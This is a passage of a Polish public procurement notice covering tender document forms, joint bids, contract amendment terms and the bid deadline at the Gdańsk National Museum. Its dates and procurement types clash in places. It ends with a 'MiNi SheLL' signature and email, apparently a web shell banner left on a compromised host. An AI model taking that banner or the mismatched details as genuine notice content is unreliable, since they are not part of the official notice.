upoważnioną do reprezentowania Wykonawcy.<br/>Dokument pełnomocnictwa może zostać załączony do oferty w:<br/>– oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem<br/>elektronicznym, podpisem osobistym lub popisem zaufanym osoby/osób<br/>upoważnionej/upoważnionych do reprezentowania Wykonawcy zgodnie z formą reprezentacji<br/>Ogłoszenie nr 2021/BZP 00088432/01 z dnia 2021-06-21<br/>2021-06-21 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej, lub<br/>– elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj.<br/>podpisanej kwalifikowanym podpisem elektronicznym, podpisem osobistym lub popisem<br/>zaufanym osoby posiadającej uprawnienia notariusza.<br/>b) w przypadku, gdy oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa – dowody,<br/>o których mowa w SWZ.<br/>Powyższy dokument może zostać załączony do oferty w:<br/>– oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem<br/>elektronicznym, podpisem osobistym lub popisem zaufanym osoby/osób<br/>upoważnionej/upoważnionych do reprezentowania Wykonawcy zgodnie z formą reprezentacji<br/>określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym<br/>dokumencie, lub<br/>– elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem, tj. podpisanej<br/>kwalifikowanym podpisem elektronicznym, podpisem osobistym lub popisem zaufanym<br/>osoby/osób upoważnionej/upoważnionych do reprezentowania Wykonawcy zgodnie z formą<br/>reprezentacji, określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub<br/>innym dokumencie.<br/>c) W przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów -<br/>dokument potwierdzający, że realizując zamówienie, Wykonawca będzie dysponował<br/>niezbędnymi zasobami tych podmiotów, w szczególności zobowiązanie tych podmiotów do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>Powyższy dokument powinien zawierać informacje dotyczące w szczególności:<br/>• zakresu dostępnych Wykonawcy zasobów innego podmiotu,<br/>• sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonaniu<br/>zamówienia,<br/>• zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia,<br/>• czy podmiot, na którego zdolnościach Wykonawca polega w odniesieniu do warunków udziału<br/>w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą (czy będzie brał<br/>udział w wykonaniu zamówienia).<br/>Powyższy dokument może zostać załączony do oferty w:<br/>– oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem<br/>elektronicznym, podpisem osobistym lub popisem zaufanym osoby/osób<br/>upoważnionej/upoważnionych do reprezentowania zgodnie z formą reprezentacji podmiotu na<br/>którego zdolnościach lub sytuacji polega Wykonawca, określoną w dokumencie rejestrowym<br/>właściwym dla formy organizacyjnej lub innym dokumencie, lub<br/>– elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem, tj. podpisanej<br/>kwalifikowanym podpisem elektronicznym, podpisem osobistym lub popisem zaufanym<br/>osoby/osób upoważnionej/upoważnionych do reprezentowania zgodnie z formą reprezentacji<br/>podmiotu, na którego zdolnościach lub sytuacji polega Wykonawca, określoną w dokumencie<br/>rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia o spełnianiu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty dostawy wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany Umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2.	Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian umowy, natomiast istotne zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, mogą dotyczyć: <br/>1) terminu realizacji zamówienia,<br/>2) wysokości wynagrodzenia należnego Wykonawcy,<br/>3) przedmiotu umowy (zmiana parametrów technicznych, modelu urządzenia)<br/>3.	Zmiany, o których mowa w ust. 2, mogą nastąpić w uzasadnionych przypadkach:<br/>1)	w zakresie ust. 2 pkt 1 - w przypadku wystąpienia „siły wyższej”. Pod pojęciem siły wyższej Zamawiający rozumie okoliczności, które pomimo zachowania należytej staranności są nieprzewidywalne oraz, którym nie można zapobiec lub przeciwstawić się skutecznie. O braku możliwości dotrzymania terminu Wykonawca obowiązany jest niezwłocznie powiadomić Zamawiającego, określając jednocześnie nowy termin realizacji zamówienia,<br/>2)	w zakresie ust. 2 pkt 2 - w przypadku zmiany stawki podatku od towarów i usług, przy czym wówczas zmianie ulega wyłącznie cena brutto,<br/>3)	w zakresie ust. 2 pkt 3 – w przypadku, gdy zmiana parametrów lub modelu urządzenia przyczyni się do poprawy jakości zamówienia, przy czym zmiana ta nie spowoduje zwiększenia kosztów realizacji zamówienia, <br/>4)	w zakresie ust. 2 - w przypadku wystąpienia innych niż w pkt 1 niezawinionych przez Wykonawcę okoliczności uniemożliwiających realizację zamówienia zgodnie z ofertą. <br/>4. Wykonawca wnioskujący o zmianę Umowy, przedkłada Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-09 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://muzeumnarodowe-gdansk.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-09 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji stanowi kryterium. 84 dni są terminem maksymalnym.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com